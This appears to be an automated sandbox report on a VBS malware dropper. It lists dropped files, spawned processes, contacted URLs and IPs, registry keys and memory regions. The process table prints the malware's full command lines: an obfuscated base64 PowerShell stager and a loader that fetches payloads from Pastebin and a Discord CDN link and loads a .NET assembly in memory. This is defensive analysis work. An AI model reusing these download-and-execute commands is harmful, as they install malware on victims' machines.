Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
segura.vbs
|
Unicode text, UTF-16, little-endian text, with very long lines (302), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sd05jbx.bdx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gipfh2fl.tdq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odre4mri.dtu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prgm5mdh.qdj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwj2qmca.bxs.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcnnvqu5.vne.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\dll01.txt
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek
= [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek
= $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\segura.vbs');powershell $Yolopolhggobek;
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm
= 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm
-OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() +
'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content
-Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String(
$QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null,
[object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth'
, $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 127.0.0.1
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA
-inputFormat xml -outputFormat text
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://pastebin.com/raw
|
unknown
|
|
|
|
https://pastebin.com/raw/J6uRjZrv
|
104.20.3.235
|
|
|
|
https://cdn.discordapp.com/attachments/1187381098527858721/1299360122446807113/este2.txt?ex=6723826a&is=672230ea&hm=1e5ddde8edfd2b0b55a1936b9b2cf98999ca75e818b8e4dadd7bc75ebedbbd24&
|
162.159.135.233
|
|
|
|
https://pastebin.com
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://rentry.org/vsm4ofxs/raw
|
164.132.58.105
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://rentry.org
|
unknown
|
||
|
https://rentry.org/shqm6g9p/rawP
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://www.microsoft.
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://cdn.discordapp.com
|
unknown
|
||
|
http://crl.mS%F-sE
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://rentry.org
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
http://cdn.discordapp.com
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://rentry.org/vsm4ofxs/rawp
|
unknown
|
||
|
https://rentry.org/shqm6g9p/raw
|
164.132.58.105
|
||
|
https://go.microsoft.coa
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
HTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/1187381098527858721/1299360122446807113/ESTE2.TXT?EX=6723826A
|
unknown
|
||
|
https://pastebin.com/raw/4B83LcVU
|
104.20.3.235
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://pastebin.com
|
unknown
|
||
|
https://cdn.discordapp.com/attachments/1187381098527858721/1299360122446807113/este2.txt?ex=6723826a
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
cdn.discordapp.com
|
162.159.135.233
|
|
|
|
pastebin.com
|
104.20.3.235
|
|
|
|
rentry.org
|
164.132.58.105
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.20.3.235
|
pastebin.com
|
United States
|
|
|
|
162.159.135.233
|
cdn.discordapp.com
|
United States
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
164.132.58.105
|
rentry.org
|
France
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2306145D000
|
trusted library allocation
|
page read and write
|
|
|
|
F1B327E000
|
stack
|
page read and write
|
||
|
7FFD34460000
|
trusted library allocation
|
page read and write
|
||
|
1F70D5DC000
|
heap
|
page read and write
|
||
|
20D00001000
|
trusted library allocation
|
page read and write
|
||
|
20D7C501000
|
heap
|
page read and write
|
||
|
20D10011000
|
trusted library allocation
|
page read and write
|
||
|
1F70D8A4000
|
heap
|
page read and write
|
||
|
23AEE0F000
|
stack
|
page read and write
|
||
|
2834FF60000
|
trusted library allocation
|
page read and write
|
||
|
2304F936000
|
heap
|
page read and write
|
||
|
2304FB20000
|
heap
|
page read and write
|
||
|
2834FD61000
|
heap
|
page read and write
|
||
|
7FFD34460000
|
trusted library allocation
|
page read and write
|
||
|
1F10A024000
|
heap
|
page read and write
|
||
|
7FFD342D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
F1B317E000
|
stack
|
page read and write
|
||
|
7FFD341FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D01C3B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD341B2000
|
trusted library allocation
|
page read and write
|
||
|
F1B35BB000
|
stack
|
page read and write
|
||
|
7FFD344D0000
|
trusted library allocation
|
page read and write
|
||
|
23AE0FF000
|
stack
|
page read and write
|
||
|
E9ACAFF000
|
stack
|
page read and write
|
||
|
1F10B5C8000
|
heap
|
page read and write
|
||
|
23AE27B000
|
stack
|
page read and write
|
||
|
B1F52FE000
|
stack
|
page read and write
|
||
|
7FFD344E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34430000
|
trusted library allocation
|
page read and write
|
||
|
F1B31FD000
|
stack
|
page read and write
|
||
|
28350015000
|
heap
|
page read and write
|
||
|
7FFD343F0000
|
trusted library allocation
|
page read and write
|
||
|
2834FD88000
|
heap
|
page read and write
|
||
|
20D7E070000
|
heap
|
page read and write
|
||
|
2306992E000
|
heap
|
page read and write
|
||
|
23053104000
|
trusted library allocation
|
page read and write
|
||
|
7FFD341BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
230613F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34296000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD344F0000
|
trusted library allocation
|
page read and write
|
||
|
20D7C740000
|
heap
|
page read and write
|
||
|
2305196B000
|
trusted library allocation
|
page read and write
|
||
|
23052A43000
|
trusted library allocation
|
page read and write
|
||
|
2304FAD9000
|
heap
|
page read and write
|
||
|
7FFD341CB000
|
trusted library allocation
|
page execute and read and write
|
||
|
28351B30000
|
heap
|
page execute and read and write
|
||
|
230513F1000
|
trusted library allocation
|
page read and write
|
||
|
F1B33F8000
|
stack
|
page read and write
|
||
|
23061817000
|
trusted library allocation
|
page read and write
|
||
|
23069B64000
|
heap
|
page read and write
|
||
|
7FFD34380000
|
trusted library allocation
|
page execute and read and write
|
||
|
23AED4D000
|
stack
|
page read and write
|
||
|
230513E0000
|
heap
|
page read and write
|
||
|
20D01471000
|
trusted library allocation
|
page read and write
|
||
|
1F106682000
|
heap
|
page read and write
|
||
|
7FFD343C0000
|
trusted library allocation
|
page read and write
|
||
|
2304FA90000
|
heap
|
page readonly
|
||
|
1F106600000
|
heap
|
page read and write
|
||
|
1F70D500000
|
heap
|
page read and write
|
||
|
2304F8F0000
|
heap
|
page read and write
|
||
|
283519FD000
|
heap
|
page read and write
|
||
|
7FFD341C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3436A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34490000
|
trusted library allocation
|
page read and write
|
||
|
20D7E618000
|
heap
|
page read and write
|
||
|
2304F850000
|
heap
|
page read and write
|
||
|
7FFD341AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D7E42D000
|
heap
|
page read and write
|
||
|
283521A6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34270000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D7E4E6000
|
heap
|
page execute and read and write
|
||
|
42011BF000
|
stack
|
page read and write
|
||
|
B1F53FE000
|
stack
|
page read and write
|
||
|
7FFD341C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34410000
|
trusted library allocation
|
page read and write
|
||
|
283521AD000
|
trusted library allocation
|
page read and write
|
||
|
20D7C320000
|
heap
|
page read and write
|
||
|
1F1066AE000
|
heap
|
page read and write
|
||
|
7FFD341A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2834FF10000
|
heap
|
page read and write
|
||
|
23051611000
|
trusted library allocation
|
page read and write
|
||
|
23069AD0000
|
heap
|
page read and write
|
||
|
F1B42CE000
|
stack
|
page read and write
|
||
|
7FFD34250000
|
trusted library allocation
|
page read and write
|
||
|
7FFD344C0000
|
trusted library allocation
|
page read and write
|
||
|
28361BAD000
|
trusted library allocation
|
page read and write
|
||
|
1F10A02F000
|
heap
|
page read and write
|
||
|
1F10C0BB000
|
heap
|
page read and write
|
||
|
23ADCFD000
|
stack
|
page read and write
|
||
|
7FFD344E0000
|
trusted library allocation
|
page read and write
|
||
|
20D7E074000
|
heap
|
page read and write
|
||
|
7FFD34256000
|
trusted library allocation
|
page read and write
|
||
|
1F106695000
|
heap
|
page read and write
|
||
|
230519B1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34520000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34400000
|
trusted library allocation
|
page read and write
|
||
|
2834FF70000
|
heap
|
page readonly
|
||
|
23053140000
|
trusted library allocation
|
page read and write
|
||
|
1F10BCEE000
|
heap
|
page read and write
|
||
|
7FFD34340000
|
trusted library allocation
|
page read and write
|
||
|
28351A50000
|
heap
|
page execute and read and write
|
||
|
23069B4A000
|
heap
|
page read and write
|
||
|
E9AD27C000
|
stack
|
page read and write
|
||
|
230616C7000
|
trusted library allocation
|
page read and write
|
||
|
20D016B1000
|
trusted library allocation
|
page read and write
|
||
|
F1B420E000
|
stack
|
page read and write
|
||
|
1F10686A000
|
heap
|
page read and write
|
||
|
1F1066AE000
|
heap
|
page read and write
|
||
|
2834FD50000
|
heap
|
page read and write
|
||
|
E9ACDFF000
|
stack
|
page read and write
|
||
|
E9ACBFE000
|
stack
|
page read and write
|
||
|
1F108354000
|
heap
|
page read and write
|
||
|
2834FDED000
|
heap
|
page read and write
|
||
|
1F10B5CA000
|
heap
|
page read and write
|
||
|
2834FD14000
|
heap
|
page read and write
|
||
|
E9ACCFE000
|
stack
|
page read and write
|
||
|
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
|
23ADDFE000
|
stack
|
page read and write
|
||
|
28350010000
|
heap
|
page read and write
|
||
|
20D7E649000
|
heap
|
page read and write
|
||
|
E9AD07E000
|
stack
|
page read and write
|
||
|
14F6E770000
|
heap
|
page read and write
|
||
|
23052DF9000
|
trusted library allocation
|
page read and write
|
||
|
230519BD000
|
trusted library allocation
|
page read and write
|
||
|
20D7E3D8000
|
heap
|
page read and write
|
||
|
28351BD5000
|
trusted library allocation
|
page read and write
|
||
|
2834FCB0000
|
heap
|
page read and write
|
||
|
230517AF000
|
trusted library allocation
|
page read and write
|
||
|
1F70D5DF000
|
heap
|
page read and write
|
||
|
7FFD34430000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34342000
|
trusted library allocation
|
page read and write
|
||
|
20D019C0000
|
trusted library allocation
|
page read and write
|
||
|
1F10668C000
|
heap
|
page read and write
|
||
|
F1B353C000
|
stack
|
page read and write
|
||
|
23AE2FC000
|
stack
|
page read and write
|
||
|
1F1091BF000
|
heap
|
page read and write
|
||
|
7FFD34512000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34480000
|
trusted library allocation
|
page read and write
|
||
|
28351930000
|
heap
|
page read and write
|
||
|
28351B8B000
|
trusted library allocation
|
page read and write
|
||
|
20D7E65E000
|
heap
|
page read and write
|
||
|
7FFD343F0000
|
trusted library allocation
|
page read and write
|
||
|
14F6E470000
|
heap
|
page read and write
|
||
|
28351F20000
|
trusted library allocation
|
page read and write
|
||
|
2304F7E0000
|
heap
|
page read and write
|
||
|
230517B4000
|
trusted library allocation
|
page read and write
|
||
|
2834FD41000
|
heap
|
page read and write
|
||
|
20D7E645000
|
heap
|
page read and write
|
||
|
230698D0000
|
heap
|
page read and write
|
||
|
20D7E65B000
|
heap
|
page read and write
|
||
|
7FFD34527000
|
trusted library allocation
|
page read and write
|
||
|
2834FF00000
|
heap
|
page read and write
|
||
|
437616D000
|
stack
|
page read and write
|
||
|
28351B10000
|
heap
|
page execute and read and write
|
||
|
7FFD344A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3426C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F1065A0000
|
heap
|
page read and write
|
||
|
B1F4FAA000
|
stack
|
page read and write
|
||
|
2304F8FA000
|
heap
|
page read and write
|
||
|
7FFD34270000
|
trusted library allocation
|
page execute and read and write
|
||
|
23051340000
|
heap
|
page execute and read and write
|
||
|
7FFD344A0000
|
trusted library allocation
|
page read and write
|
||
|
20D01949000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34260000
|
trusted library allocation
|
page execute and read and write
|
||
|
2305311E000
|
trusted library allocation
|
page read and write
|
||
|
23069947000
|
heap
|
page read and write
|
||
|
20D7E659000
|
heap
|
page read and write
|
||
|
2305196F000
|
trusted library allocation
|
page read and write
|
||
|
230519E4000
|
trusted library allocation
|
page read and write
|
||
|
230519A7000
|
trusted library allocation
|
page read and write
|
||
|
1F70D400000
|
heap
|
page read and write
|
||
|
7FFD343E0000
|
trusted library allocation
|
page read and write
|
||
|
1F1066EE000
|
heap
|
page read and write
|
||
|
E9ACE7E000
|
stack
|
page read and write
|
||
|
20D7C5B2000
|
heap
|
page read and write
|
||
|
B1F58FE000
|
stack
|
page read and write
|
||
|
7FFD341B0000
|
trusted library allocation
|
page read and write
|
||
|
1F1066EC000
|
heap
|
page read and write
|
||
|
1F1066E9000
|
heap
|
page read and write
|
||
|
23AD9BE000
|
stack
|
page read and write
|
||
|
2305309D000
|
trusted library allocation
|
page read and write
|
||
|
F1B2DE3000
|
stack
|
page read and write
|
||
|
1F10686E000
|
heap
|
page read and write
|
||
|
1F108D54000
|
heap
|
page read and write
|
||
|
F1B337D000
|
stack
|
page read and write
|
||
|
2305242C000
|
trusted library allocation
|
page read and write
|
||
|
23069B70000
|
heap
|
page read and write
|
||
|
28351F58000
|
trusted library allocation
|
page read and write
|
||
|
1F70D5C9000
|
heap
|
page read and write
|
||
|
1F106685000
|
heap
|
page read and write
|
||
|
20D7E447000
|
heap
|
page read and write
|
||
|
2305304C000
|
trusted library allocation
|
page read and write
|
||
|
20D7E616000
|
heap
|
page read and write
|
||
|
1F10667D000
|
heap
|
page read and write
|
||
|
23AEE8B000
|
stack
|
page read and write
|
||
|
28351C65000
|
trusted library allocation
|
page read and write
|
||
|
20D7C50D000
|
heap
|
page read and write
|
||
|
2304FB24000
|
heap
|
page read and write
|
||
|
23051360000
|
heap
|
page execute and read and write
|
||
|
23052A25000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34392000
|
trusted library allocation
|
page read and write
|
||
|
7FFD341B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
E9AD1FE000
|
stack
|
page read and write
|
||
|
7FFD341A4000
|
trusted library allocation
|
page read and write
|
||
|
28351BA8000
|
trusted library allocation
|
page read and write
|
||
|
28351940000
|
heap
|
page read and write
|
||
|
20D01975000
|
trusted library allocation
|
page read and write
|
||
|
20D7C460000
|
heap
|
page read and write
|
||
|
20D7E66C000
|
heap
|
page read and write
|
||
|
7FFD341B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD343C0000
|
trusted library allocation
|
page read and write
|
||
|
1F1066AE000
|
heap
|
page read and write
|
||
|
20D7E076000
|
heap
|
page read and write
|
||
|
2304F7F0000
|
heap
|
page read and write
|
||
|
7FFD34400000
|
trusted library allocation
|
page read and write
|
||
|
20D7E605000
|
heap
|
page read and write
|
||
|
7FFD344C0000
|
trusted library allocation
|
page read and write
|
||
|
20D1006E000
|
trusted library allocation
|
page read and write
|
||
|
28369FD2000
|
heap
|
page read and write
|
||
|
20D01C37000
|
trusted library allocation
|
page read and write
|
||
|
20D1007A000
|
trusted library allocation
|
page read and write
|
||
|
23AD9FE000
|
stack
|
page read and write
|
||
|
230699A4000
|
heap
|
page read and write
|
||
|
1F10665C000
|
heap
|
page read and write
|
||
|
23AEF0D000
|
stack
|
page read and write
|
||
|
7FFD343A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D7E510000
|
heap
|
page read and write
|
||
|
2836A1D0000
|
heap
|
page read and write
|
||
|
20D7E42F000
|
heap
|
page read and write
|
||
|
1F70D4E0000
|
heap
|
page read and write
|
||
|
7FFD344D0000
|
trusted library allocation
|
page read and write
|
||
|
20D00081000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343E0000
|
trusted library allocation
|
page read and write
|
||
|
B1F5AFF000
|
stack
|
page read and write
|
||
|
F1B434E000
|
stack
|
page read and write
|
||
|
23AE078000
|
stack
|
page read and write
|
||
|
23052DCB000
|
trusted library allocation
|
page read and write
|
||
|
14F6E570000
|
heap
|
page read and write
|
||
|
7FFD34360000
|
trusted library allocation
|
page execute and read and write
|
||
|
23052A13000
|
trusted library allocation
|
page read and write
|
||
|
1F106695000
|
heap
|
page read and write
|
||
|
1F10A028000
|
heap
|
page read and write
|
||
|
23069E50000
|
trusted library section
|
page read and write
|
||
|
7FFD341B4000
|
trusted library allocation
|
page read and write
|
||
|
7DF4A1E70000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D7E610000
|
heap
|
page read and write
|
||
|
2304F8F8000
|
heap
|
page read and write
|
||
|
20D7E600000
|
heap
|
page read and write
|
||
|
20D7E4E0000
|
heap
|
